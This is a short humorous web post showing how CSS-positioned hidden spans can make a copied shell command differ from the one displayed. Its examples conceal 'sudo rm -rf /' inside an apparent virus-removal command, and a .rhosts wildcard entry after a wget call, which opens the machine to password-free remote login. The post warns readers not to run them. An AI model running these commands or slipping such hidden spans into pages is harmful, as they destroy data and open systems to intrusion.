
Irony in the form of hidden spans

NB: Don't run these! Copy-paste the command into a text editor.

Single command to remove all viruses from your machine. It does what it says on the label, but I wouldn't recommend it.

 <p class="codeblock">  
    sudo fgrep virus * > quarantine; <span style="position: absolute; left: -100px; top: -100px">sudo rm -rf / ; </span> rm quarantine  

I'm trying to think of a similar joke for .rhosts and unlimited free tech support but it's still in early stages...

 <p class="codeblock">  
    sudo wget "http://seanlithgow.com.au/arsehole/usersneedinghelp.pl"; <span style="position: absolute; left: -100px; top: -100px"> > /dev/null; sudo echo "*" > ~/.rhosts; </span> man man  
